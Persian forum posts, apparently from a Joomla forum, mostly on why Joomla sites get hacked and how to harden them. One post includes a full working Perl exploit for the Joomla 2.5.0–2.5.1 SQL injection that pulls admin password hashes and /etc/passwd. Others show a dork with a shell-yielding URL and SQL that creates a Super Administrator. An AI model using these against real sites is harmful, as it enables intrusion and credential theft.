Pooyan Afzali

واسه تمامی قالب ها از شرکت های مختلف صدق میکنه؟

نیازی به نوشتن پلاگین اختصاصی نیست پلاگین اتصال بانک های مختلف به rsmembership هست که میتونید از p30joomla بخرید که همون کار رو انجام میده البته نسخه های رایگانشم هست و یا نال شده اما به لحاظ امنیت توصیه نمیشه چون پشتیبانی خوبی نداره و ....

درود میتونید یک بار بسته نصب جولا رو اکسترکت و بعد پوشه نصب رو حذف کنید ممکنه درست بشه

درود با استفاده از کامپوننت rsmembership میتونید سیستم فروش اکانت مدت دار رو ایجاد کنید برای جوملا

درود قاعده کلی عدم دسترسی به یک فایل خاص به این صورته عدم دسترسی به تمام فایلهای یک پوشه (اگه داخل روت بریزید سراسری میشه) <Files *> Order allow,deny Deny from All </Files> عدم دسترسی به یک پسوند خاص در یک پوشه یا روت <Files ~ “\.(php)$”> Order allow,deny Deny from All </Files> مثلا اینجا ما فایلهای با پسوند php رو عدم دسترسی قرار دادیم و بقیه قابل دسترسی هستند عدم دسترسی به چند پسوند خاص <Files ~ “\.(js|sql|other-extension…)$”> Order allow,deny Deny from All </Files> در اینجا دسترسی به پسوند های js و sql رو غیر مجاز کردیم و بقیه رو مجاز عدم دسترسی به htaccessو htpasswd <Files ~ “^\.ht”> Order allow,deny Deny from All </Files> عدم دسترسی به فایلهای خاص <Files php.ini> <Files configuration.php> order allow,deny deny from all </Files> نکته این کد ها رو داخل مقالات قرار میدم که همه استفاده کنند

درود دوست عزیز کد ها رو باید داخل خود فایل htaccess وارد کنید

درود پنجم عدم پیکربندی صحیح مجوز پوشه ها و فایلها پیکربندی صحیح مجوز پوشه ها شامل چند مورد میشه که اگه درست انجام بشه تا حد زیادی باعث هک نشدن میشه و یک سد دیگه برای هکر هاست چطور؟ یکی از روش های متداول هک کردن آپلود اسکریپت مخرب به سایت هست و گرفتن شل!! فرض کنید امکانی رو برای سایتون و یا کاربراتون ایجاد کردید که میتونن فایل آپلود کنن مثل عکس و... حالا اگه پوشه ای که فایلها داخلش اپلود میشن رو درست پیکر بندی نکنید هر فایلی مجوز آپلود داره و بیشتر فایل های شل یا پسوند js یا php دارند و هکر میاد عضو میشه و کد شل رو اپلود میکنه و.... داخل یه پوشه هایی اصلا نباید هیچ فایلی آپلود بشه کلا باید ببندینش داخل یه پوشه هایی فایلهایی با پسوند های خاص میتونه اپلود بشه،باید محدود کنید داخل یک پوشه هایی فقط مدیریت باید فایل آپلود کنه ، باید دسترسی مدیریت بزارید برای اون پوشه یک پوشه هایی رو فقط باید محدود به آی پی های خاصی کنید مثل پوشه مدیریت(بعدا مفصلا در مورد امنیت پوشه مدیریت توضیح میدم) بعضی پوشه ها محتویاتش اصلا نباید دیده بشه!! مجوز فایلها مهمترین فایلهایی که باید حتما از دسترسی بهشون جلوگیری کنید فایلهای زیر هست htaccess php.ini configuration.php index.php که هم باید مجوز رو 644 بزارید و هم توسط htaccess عدم دسترسی و فراخوانی کنید تمام این کارها رو با htaccess میتونید انجام بدید مورد بعدی مجوز پوشه هست که باید روی 755 باشه!! اینقدر که این مهمه که...!!! اما بازم میبینم بعضی از دوستان پوشه هاشون باز هست!!!! چیزایی که گفتم شاید ساده باشه اما اگه بگم همین دوهفته پیش یک سایت که کارش فروش لایسنس نرم افزارها بود با همین روش آپلود شل در پوشه آپلود عکس هاش رفت رو هوا و کلی لایسنس ازش کش رفتن اونوقت متوجه میشید که چقدر مهمه پوشه هاتونو درست تنظیم کنید در واقع دروازتونو محکم ببندین که هر کسی وارد شهرتون نشه!!!

پس به احتمال زیاد قصد هک کردن سایتتونو داشتند که مرتبا سایت رو با پکت های زیاد و متوالی فراخوانی کردند و فایروال سرور هم سریعا جلوشو گرفته و گرنه همونطور که گفتم سرور از سرویس خارج میشد اخیرا سایتهای جوملایی زیاد مورد حمله واقع میشند دوستان یک مقدار مراقب باشید

بنظرم دوست عزیز از فضای 500mb شروع کنید که سالانه بین 20-35 هزار هست هم مطمئن و هم هزینه کمی داره برای شروع از هاست رایگان فقط جهت تمرین و آموزش استفاده کنید

درود دقیقا مشخص نکرده کدوم برنامه! اما میتونه بدلیل حملات ddos به سایتتون باشه (حملاتی که باعث ارسال پکت های زیاد و متوالی به سرور که باعث بالا رفتن بیش از حد سی پی یو و اورلود شدن سرور میشه که فلود هم میشه گفت) البته بازم بپرسید از نت افزار

سلام من پلاگبن پرداخت آنلاین بانک پاسارگاد رو میخوام بسته رایگانش پلاگین نداره باید خریداری بشه یا پلاگین رایگانش هست؟ ممنون

درود چهارم پیشفرض بودن شناسه کاربری super administrator میدونید که وقتی جوملا رو نصب میکینید بصورت خودکار یک کاربر بنام admin با شناسه 62 ایجاد میشه (جوملا 1.5 به بالا شناسه 42 ایجاد میشه)که همون مدیر کل هست وجود این نام کاربری با این شناسه میتونه خطرناک باشه چرا که هکر بصورت پیشفرض میدونه شناسه ادمین شما چند هست و با پیدا کردن یک باگ و اتصال اون به شناسه ادمین و دسترسی به این شناسه میتونه به سایت شما دسترسی داشته باشه راه حل 1-از مدیریت کاربران یک کاربر جدی بسازید و بهش دسترسی مدیر کل رو بدید ، بعد از پنل مدیریت خارج شده و با کاربری جدیدی که ساختید وارد بشید و کاربر admin رو پاک کنید البته این کار بازم خیلی قوی نیست چرا که نام گزاری شناسه بترتیب هست و بعد از 62 عدد 63 و بعد از عدد 42 عدد 43 جایگزین میشه که بازم قابل حدس هست 2- میتونید از افزونه admin tools استفاده کنید 3- اگه دستورات mysql رو بلد هستید میتونید از اون روش هم استفاده کنید در اینجا نحوه ایجاد نام کاربری بوسیله دستورات my sql رو قرار میدم که توسط دستور replace بجای insert انجام میشه که از خطای دیتابیس موجود است جلوگیری کنیم REPLACE INTO `jos_users` (`id`, `name`, `username`, `email`, `password`, `usertype`, `block`, `sendEmail`, `gid`, `registerDate`, `lastvisitDate`, `activation`, `params`) VALUES ('60', 'T. Hacker', 'hacker', ' hackme@example.com', '18b42a5df78808abca92bc021a191991:abcdefghijklmnopqrstuvwxyz012345', 'Super Administrator', '0', '0', '25', '2000-01-01 00:00:00', '0000-00-00 00:00:00', '', ''); جدول پیشفرض jos_user هست اگه پیشوند جدول رو تغییر دادید اونو جایگزین کنید در اینجا کا یک نام کاربری بنام T. Hacker با شناسه 60 با رمز عبور hacker ایجاد کردیم که خودتون میتونید مقادیر این دو تا و تغییر بدید REPLACE INTO `jos_core_acl_aro` (`id`, `section_value`, `value`, `order_value`, `name`, `hidden`) VALUES ('8', 'users', '60', '0', 'T. Hacker', '0'); اینجا ما یک ARO OBJECT یا Access Request Object با شناسه 8 میسازیم. توجه کنید قسمت نام و شناسه در این دستور دقیقا مطابق با نام و شناسه ای که در دستور اول وارد کریم باشه!! REPLACE INTO `jos_core_acl_groups_aro_map` (`group_id`, `section_value`, `aro_id`) VALUES ('25', '', '8'); در اینجا ما گروه کاربری رو با شناسه 25 ایجاد . به aro oject متصل می کنیم منبع کد : http://www.dionysopoulos.me ترحمه انجمن جوملای ایران

درود سوم پیشفرض بودن ،پیشوند پایگاه داده سومین عامل هک شدن سایت های جوملایی پیشفرض بودن پیشوند پایگاه داده هست علت؟ مهمترین علتش اینه که چون jos پیشوند پیشفرض جوملا هست، با تغییر ندادن این عبارت کار هکر رو خیلی راحت تر کردید برای حملات تزریق کد همچنین برای سایتهایی که پیشوند پایگاه دادشون jos هست چندین اکسپلویت هست که میشه با اونا سایت رو هک کرد..!!!! چرا؟ چون حملات تزریق کد برای پیدا کردن یوزر و پسورد مدیر سایت میاد از جدول jos_user استفاده میکنند و خیلی از کاربران این پیشوند رو تغییر نمیدند و وقتی تونست به جدول یوزر ها دسترسی پیدا کنه ...! میدونید که در داخل این جودل اطلاعات کامل تمام کاربران از جمله مدیریت با تمام جزیات مثل پسورد و.. داخلش هست با پیدا کردن کاربری مدیر سایت و همچنین کرک کردن پسورد مدیر (چون پسورد بصورت هش شده هست و اگه رمز عبور قوی انتخاب نکرده باشید.....!!!!!) براحتی سایت رو هک میکنه!!! به همین راحتی با عوض نکردن پیشوند پایگاه داده سایتتون خودتونو در معرض هک شدن قرار میدید!!!! حالا چطور عوض کنیم: 1- یا باید وارد phpmyadmin بشید و از دیتابیس export بگیرید و داخل نرم افزار notpad++ باز کنید و تمام jos ها رو به عبارت مورد نظر تغییر بدید و دوباره ایمپورت کنید 2- یا اینکه میتونید از کامپوننت admin tools استفاده کنید که راحت ت هست و با یک کلیک همه رو انجام میده با تغییر این نام براحتی جلوی خیلی یا شایدم همه حملات تزریق کد از طریق جدول کاربران و یا حتی جدول کامپوننت ها رو میگیرید و میتونید خاطر جمع باشید که حداقل از طریق بدست اومدن جدول کاربری جوملا هک نمیشید و به این ترتیب یک سد قوی دیگه در برابر حملات هک قرار دادید پیروز و پایدار باشید

درود درواقع باگ های 2.5.0 و 2.5.1 یکی هستند و در نسخه 2.5.3 تصلاح شدند

من واسه طراحی سایت یه فرم قرارداد دارم و تمام مسائل و جزیات پروژه رو قید میکنم که اگه خواست دبه کنه حق شکایت داشته اشم که شامل زمان پروژه امکانات پروژه درخواست ها و تعهدات طرفین هست نصف پولو اول میگیرم و بعد بسته به امکانات درخواستی همون اول میگم چند میشه قیمت پایه هم 250 تومن هست و واسه هر امکاناتیم بسته به نوعش معمولا بین 15- 50 تومن میگیرم هاست و دامینم بهش یه سال هدیه میدم پشتیبانی فنی یک ساله هم میدم

درود و عرض تبریک جناب نوین فرد با آرزوی موفقیت روز افزون شما

درود چون ساختار جوملا 2.5 با 1.5 تفاوت اساسی داره طبیعاتا در مواردی مشکل داره و خودتون دستی باید اصلاح کنید مثلا هر مطلبی که لینکش خرابه باید دستی درستش کنید قبلش از دیتا بیس بک اپ بگیرید و بعد تغییراتش رو دلخواه انجام بدید

درود بهترین راه حل که همزمان مجموعه ، مطالب،کاربران و.. منتقل میشه استفاده از jupgrade هست همچنین خودش نسخه جوملا 2.5 رو اوتوماتیک نصب میکنه

درود دوم بروز نبودن هسته جوملا دومین عامل هک شدن یک سایت جوملایی بروز نبودن هسته هست ، هرچند هسته جوملا خیلی قوی و امن هست اما بعضی مواقع ازش یه باگ هایی بیرون میاد که میتونه منبجر به هک شدن بشه البته بلافاصله واسش پچ میاد اما خیلیا توجهی نمیکنن بزارید چند تا مثال عملی و عینی بزنم تا بیشتر متوجه اهمیت بروز رسانی رو متوجه بشید میدونید که جدیدا بسته بروز رسانی جوملا 2.5.3 اومد ، میدونید علتش چیه؟؟؟ علتش کشف باگ SQL Injection در جوملا 2.5.0 و 2.5.1 بود (حملات تزریق کد) که هکر میتونه با تزریق کد سایت های جوملایی که نسخه ها 2.5.1 و 2.5.0 رو بزنه!!! و خیلیا هم هنوز بروز رسانی نکردند حالا چطوری 2.5.1 و 2.5.0 میره رو هوا؟؟ هکر میاد واسه سایت های جوملایی که هنوز بروز رسانی نکردند یه دورک میسازه و سایت ها رو شناسایی میکنه و بعد... اینم کد اکسپلویت هک هکردن جوملا 2.5.1 و 2.5.0 #!/usr/bin/perl # Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net> # www.securitybydefault.com # Joomla <2.5.1 time based sql injection - vuln by Colin Wong # # using sleep() and not benchmark(), change for < mysql 5.0.12 # # 1.- Database name: database() # 2.- Users data table name: (change 'joomla' for database() result) # select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users" # 3.- Admin password: (change zzz_users from previus sql query result) # select password from zzzz_users limit 1 use strict; use LWP::UserAgent; $| = 1; my $url = $ARGV[0]; my $wtime = $ARGV[1]; my $sql = $ARGV[2]; unless ($ARGV[2]) { print "$0 <url> <wait time> <sql>\n"; print "\texamples:\n"; print "\t get admin password:\n"; print "\t\t$0 http://host/joomla/ 3 'database()'\n"; print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n"; print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n"; print "\t get file /etc/passwd\n"; print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n"; exit 1; } my ($len,$sqldata); my $ua = LWP::UserAgent->new; $ua->timeout(60); $ua->env_proxy; my $stime = time(); my $res = $ua->get($url); my $etime = time(); my $regrtt = $etime - $stime; print "rtt: $regrtt secs\n"; print "vuln?: "; my $sleep = $regrtt + $wtime; $stime = time(); $res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1"); $etime = time(); my $rtt = $etime - $stime; if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope \n"; exit 1; } my $lenoflen; sub len { # length of length for (1..5) { my $sql=$_[0]; $stime = time(); $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1"); $etime = time(); my $rtt = $etime - $stime; if ($rtt >= $regrtt + $wtime) { $lenoflen = $_; last; } } for (1..$lenoflen) { my $ll; $ll=$_; for (0..9) { my $sql=$_[0]; $stime = time(); $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1"); $etime = time(); my $rtt = $etime - $stime; if ($rtt >= $regrtt + $wtime) { $len .= $_; } } } return $len; } sub data { my $sql = $_[0]; my $len = $_[1]; my ($bit, $str, @byte); my $high = 128; for (1..$len) { my $c=8; @byte=""; my $a=$_; for ($bit=1;$bit<=$high;$bit*=2) { $stime = time(); # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1'; $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1"); $etime = time(); my $rtt = $etime - $stime; if ($rtt >= $regrtt + $wtime) { $byte[$c]="0"; } else { $byte[$c]="1"; } $c--; } $str = join("",@byte); print pack("B*","$str"); } } $len = len($sql); print "$sql length: $len\n"; print "$sql data:\n\n"; data($sql,$len); یا مثلا در هسته جوملا 1.6.3 یه باگ خطرناک xss کشف شد که بازم خیلیا رو هک کردن با اون باگ!! لطفا از اکسپلویت برای هک کردن سایت استفاده نکنید بلکه صرفا جهت اطلاع بود و بس!!! خواستم بدونید اهمیت بروز رسانی هسته جوملا چقدر بالاست همین!!!

درود جناب irantechnic در مورد هاست رایگان شما اطلاعی ندارم اما نکاتی که بالا گفتم در مورد همه هاستینگ های رایگان بود و نه فقط صرفا یو هاستینگ حرفتون درسته هسته جوملا به صورت خام خیلی قوی هست و سابقه هک هم هر چی سرچ کردن نبود ازش و اگه تاپیک زیر رو مطالعه کنید میبینید که تاکید اصلی من بر روی افزونه های نصب شده روی جوملا هست http://joomlaforum.ir/showthread.php/1195-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%AC%D8%A7%D9%85%D8%B9-quot-%D8%B1%D8%A7%D9%87%DA%A9%D8%A7%D8%B1-%D9%87%D8%A7%DB%8C-%D8%AC%D9%84%D9%88%DA%AF%DB%8C%D8%B1%DB%8C-%D8%A7%D8%B2-%D9%87%DA%A9-%D8%B4%D8%AF%D9%86-%D8%B3%D8%A7%DB%8C%D8%AA-%D8%8C-%D8%A7%D8%B1%D8%AA%D9%82%D8%A7%DB%8C-%D8%A7%D9%85%D9%86%DB%8C%D8%AA-%D9%88-%D8%AD%D9%81%D8%B8-%D9%BE%D8%A7%DB%8C%D8%AF%D8%A7%D8%B1%DB%8C-%D8%B3%D8%A7%DB%8C%D8%AA-quot/page2 ویژه "علل هک شدن سایت های جوملایی" ویژه قسمت دوم موفق باشید

پیرو صحبت جناب مردانه زاده بگم که هاست های رایگان ۱- هیچ گونه تعهدی در قبال امنیت شما ندارند ۲- از سرورهای ضعیف و نسبتا قدیمی استفاده میکنند ۳- منابعی که در اختیارتون هست خیلی کمه ۴- هر لحظه ممکنه over load بشه و سایت بسته بشه ۵- هیچ تعهدی در قبال اطلاعات و بک آپ شما ندارند و اگه بره که رفته(هر چند بعضی از شرکت های هاستینگ پولی هم یه ورایی تعهدی برای اطلاعات ندارند) ۶- امکانات محدود ۷- پشتیبانی خیلی ضعیف ۸- احتمال بسته شدن آی پی و تحریم شدن هست و اعتباری به ماندگاریش نیست ۹- اصولا هاست رایگان معنی واقعی نداره به نظرم بلکه یه جور پیش نمایش از خدمات هست یا یه جور اشانتیون!! اما اگه هدفتون آموزشی و یادگیری و تست هست خوب میتونید ثبت کنید اما اگه قصد جدی دارید بی خیال بشید ضمنا نیازی نیست همون اول برید یه هاست توپ با 5 گیگ فضا و... بگیرید برای راه اندازی اولیه یک سایت مثلا جوملا 500 مگ کفایت میکنه و حیت تا یکسال شایدم بیشتر شما رو بیمه میکنه موفق باشید

دیشب که از مسافرت عید برگشتم متوجه شدم که ipod video نیست!!! هر چی ماشینو گشتم نبود که نبود آخرین بار گزاشتمش پشت صندلی!! اما چند بار که محکم روی سرعت گیر ها زدم!!! فکر کنم افتاده زمین و وقتی پیاده شدم پرت شده بیرون!! بعد از 6 سال داشتن ipod از دستش دادم، همراه همیشگی من بود!! خیلی دوسش داشتم!! 6 سال تموم در تمام لحظات باهام بود!! فقط امیدوارم اونی که پیداش میکنه اینقدر مرام داشته باشه که عکس های شخصیمو پاک کنه و ipod نوش جونش!!

علل هک شدن سایت های جوملایی خوب در این قسمت به دنبال پست قبلی میام مهمترین عللی که باعث میشن یک سایت جوملایی هک بشه رو بررسی میکنم و قدم به قدم میگم که چه عواملی زنگ خطر امنیت سایت هستند و اگه بهشون توجه نکنید هر کدوم به تنهایی میتونه یک خطر مهم محسوب بشه نکته: هر عامل رو در یک پست مجزا توضیح میدم که راحت تر در دسترس باشه علل رو بدون ترتیب اهمیت و تصادفی گزاشتم و اولویت بندی نکردم ممکنه بعضی از عوامل بسته به نسخه جوملا متفاوت باشه و صرفا برای یک نسخه گفته شده باشه و عمومی نباشه ممکنه بعضی عوامل بسته به نوع و تنظیمات سایت باشه و صداقش در سایت شما نباشه کپی رایت انجمن رو رعایت کنید لطفا اولین عامل بروز نبودن افزونه های نصب شده! این شاید یکی از مهم ترین علت هک شدن سایت های جوملایی باشه! خیلی باید مراقب این عامل باشید چون خیلی از حملات هک بدلیل وجود یک افزونه قدیمی هست ! حالا چطوری؟ ببینید بهر حال به مرور زمان در یک کد ممکنه یک آسیب پذیری کشف بشه و این خیلی مهمه که سازنده اون افزونه سریعا بیاد و دیباگ کنه و نسخه اصلاح شده اون افزونه رو منتشر کنه در غیر این صورت وجود اون افزونه تبدیل به پاشنه آشیل سایت شما میشه . حالا چطور وجود یک باگ در افزونه قدیمی باعث هک شدن میشه؟ ببینید یه بحث هست بنام دورک (dork) که در واقع یک الگوریتم جستجوی پیشرفته هست و هکر با دونستن بک باگ در یک افزونه میاد واسش یه دورک میسازه و مثلا به گوگل میگه تمام سایت هایی که فلان افزونه فلان نسخه روشون نصب هست رو برام پیدا کن و این کار در عرض چند ثانبه انجام میشه!! به همین راحتی!! بنابرین اکیدا و شدیدا توصیه میکنم همیشه افزونه های سایتتونو بروز نگه دارید و در صورت وجود پچ بروز رسانی حتما اونو بروز کنید تا سایتتون تبدیل به یک دورک خوشمزه واسه هکر نشه و براحتی قابل دسترس نباشیده بعد اینکه بعضی از افزونه ها دیگه پشتیبانی نمیشند و مثلا تا سال 2010 بروز رسانی میشده توسط سازنده اینجا دو تا نکته هست اول یا باید بیخیال اون افزونه بشید و برید مورد مشابه بروز شدشو نصب کنید که کارایی همونو داره دوم اینکه اگه میخواید همچنان از اون افزونه قدیمی استفاده کنید حتما به سازندش یه ایمیل بزنید و از وجود باگ یا امن بودن آخرین نسخش مطمئن بشید که باگی نداره و یا جستجو کنید در غیر این صورت با ریسک بالا از اون افزونه استفاده کنید حتما به سایت زیر برید و لیست باگ های موجود در افزونه های جوملایی رو چک کنید در این سایت اومده تمامی افزونه هایی که ازشون باگ کشف شده رو لیست کرده و وضعیت افزونه رو مشخص کرده که مثلا براش پچ اومده یا نه کلا باید پاکش کنید http://docs.joomla.org/Vulnerable_Extensions_List_oct#JB_Microblog مثال مثلا من اومدم واسه کامپوننت com_comprofiler یه دورک ساختم که هر سایتی که این کامپوننت نصب هست رو بهمون نشون بده inurl:"com_comprofiler" که وقتی وارد سایت مورد نظر شدید با رفتن به آدرس administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell میتونستید ازش شل بگیرید البته این صرفا یک مثال آموزشی بود و جنبه هک نداره چون این باگ برای نسخه های قبلی این افزونه بود که میشد ازش شل گرفت و خیلیا هم به این دلیل رفتن رو هوا! ولی در نسخه های بعدی برطرف و دیباگ شد و دیگه قابل استفاده نیست منتظر قسمت های بعد باشید

درود با تبریک سال جدید و آرزوی موفقیت برای شما عزیزان و وبستران جوملایی متاسفانه اخیرا شاهد این هستیم که سایت های جوملایی ایران توسط گروههای هک عربی و جدیدا هم ترکیه ای هک شده و میشه و این باعث تاسف و ناراحتی همه ها هست برای همین تصمیم گرفتم در مورد علل هک شدن یک سایت جوملایی از طریق سایت توضیحاتی رو ارائه بدم بازم تاکید میکنم من اینجا فقط علل هک بدلیل ضعف خود سایت جوملایی رو بررسی میکنم و در واقع علل هک از طریق سایت رو میگم و فقط یه توضیح مختصر در مورد هک سرور میگم. چرا که سرور از دسترس کاربر جوملا خارج هست و من قصد دارم روی عواملی تاکید کنم که خود مدیر سایت توانایی کنترل اونا رو داره و اگه علل هک از طریق سرور رو هم بگم مدیر سایت کاری نمیتونه انجام بده و فقط توسط مدیر سرور قابل دسترس هست که اونم داخل ایران زیر مجموعه یک دیتاسنتر در یک کشور خارجی هست (چون هزینه سرور و دیتاسنتر داخل ایرانی خیلی بالاست) هر چند بعضی از سایت های جوملایی که هک شدند بدلیل ضعف سایت نبوده و بدلیل ضعف در سرور و یا دیتاسنتر بوده که در این موراد صاحب سایت قربانی ضعف سرور میشه و تقصیری نداره مقدمه همونطور که میدنید هک یا طریق سرور هست که هکر میاد بوسیله یک باگ در سرور یه شل یا روت کیت و ..... روی سرور سوار میکنه و به تمام سایت هایی که روی سرور یا دیتاسنتر قرار دارند دسترسی پیدا میکنه که اینجا دیگه هیچ کاری از دست صاحبان سایت برنمیاد به جز داشتن بک آپ و بازگردانی!!! که اخیرا هم شاهد بودیم که یک هکر ترکیه ای اومد روی دیتاسنتر leaseweb که در کشور هلند هست و سایت های معروف ایرانی مثل آشیانه پی سی دانلود و.. روش سوار هستند رو یک روت کیت روی دستاسنتر نصب کرد و باعث دیفیس شدن سایت آشیانه شد که اصلا ربطی به دلیل ضعف سایت آشیانه و حتی سرورشون نداشت (طبق بیانیه ای که ارائه دادن) و از دیتاسنتر خوردن و قربانی ضعف اون شدن! یک موقع دیگه هست که ربطی به سرور نداره و فقط بدلیل بی دقتی و کم توجهی خود مدیر سایت هک ایجاد میشه و حتی ممکنه باعث هک شدن سرور هم بشه!! که بحث اصلی من اینجاست! و من در اینجا مورد دوم رو مورد بحث قرار میدم فقط در مورد سروری که ازش هاست گرفتید چند تا نکته میگم که حد اقل قربانی اولی نشید چون خداییش خیلی بی انصافیه و ظلم هست که بدلیل اشتباه سرور کلی سایت بره رو هوا!! بقولی آش نخورده و دهن سوخته!! لطفا برید و توضیحات منو در مورد انتخاب سرور یه بار مرور کنید و برگردید اینجا! من اینجا دوباره نکاتی رو ارائه میدم اول اینکه لطفا از شرکت هایی که واقعا شناختی ندارید هاست نگیرید و حد اقل اسمشونو داخل گوگل یه جستجو بزنید و همچنین داخل سایت zone-h یه جستجو کنید دوم اینکه به تبلیغات سایت ارائه دهنده سرور خیلی توجه نکنید و صحت خدمات ارائه شدشونو بررسی کنید یکسری تنظیمات مخصوص سایت های جوملایی باید روی سرور فعال و غیر فعال بشه که بعدا قسسمت های بعدی میگم سوم حتما از مسول فنی سرور بپرسید که از کدوم دیتاسنتر سرویس میگیرند و اسمشو یه جستجو بکنید ببین داخل فروم ها در موردش چی میگن؟ آیا سابقه هک شدن داره؟ چند بار؟ از چه روشی؟ و... و از متخصصین هاستینگ در فروم webhostingtalk هم حتما مشورت بگیرید البته مراقب تبلیغات باشید!!! چهارم اینکه در خدمات هاستینگ بعضی از شرکت ها واقعا کارشون عالی هست ولی قیمتشون یکم بالاست که باید توجه کنید بالا بودن قیمت بشرط بالا بودن امنیت واقعا می ارزه و وقتی میبینید فلان سرور طی چند سال اخیر اصلا هک نشده ارزششو داره یکم گرون تر ازش هاست بگیرید در واقع میخوام اینو بگم بعضی از شرکت های سرویس دهنده هاست میان با تبلیغات زیاد و هاست اختصاصی و خلاصه یکسری جملات باعث میشن کاربران گمراه بشن چرا که گرفتن نمایندگی سرور اختصتصی اصلا کار سختی نیست در واقع گرفتن نمایندگی سرور و فروش هاست اصلا مهم نیست مهم مدیریت صحیح و درست پیکر بندی کردن سرور هست!! این خیلی مهمه ! یعنی اون شخصی که مسول فنی سرور و پیکر بندی کردن سرور و مدیریت دستورات و مسول انیت سرور و حتی دیتا سنتر هست چقدر تونسته راه های نفوذ رو ببنده چقدر بروز هست؟ از چه روش هایی برای امنیت استفاده میکنه؟ چقدر به لینوکس و ویندوز و دستورات آشنایی داره ..... ! هر چند امنیت هیچوقت 100 نیست و بالاخره هر کاری یه راهی داره اما اینکه ضعف بارز باشه و عملا باعث هک شدن بشه خیلی بده! اینا چیزایی بود که در مورد سرور میشد گفت و کاربردی بود حالا بازم بعدا اگه دوباره موردی بود بازم میگم قسمت دوم رو در پست بعدی میزارم که اختصاص داره به مهمترین علل هک شدن سایت های جوملایی که خیلی خیلی کاربردی هست

درود دوست عزیز همین الان فایل رو دانلود و اکسترکت کردم و بدون مشکل از حالت فشرده خارج و اجرا شد رمز عبور: www.joomlaforum.ir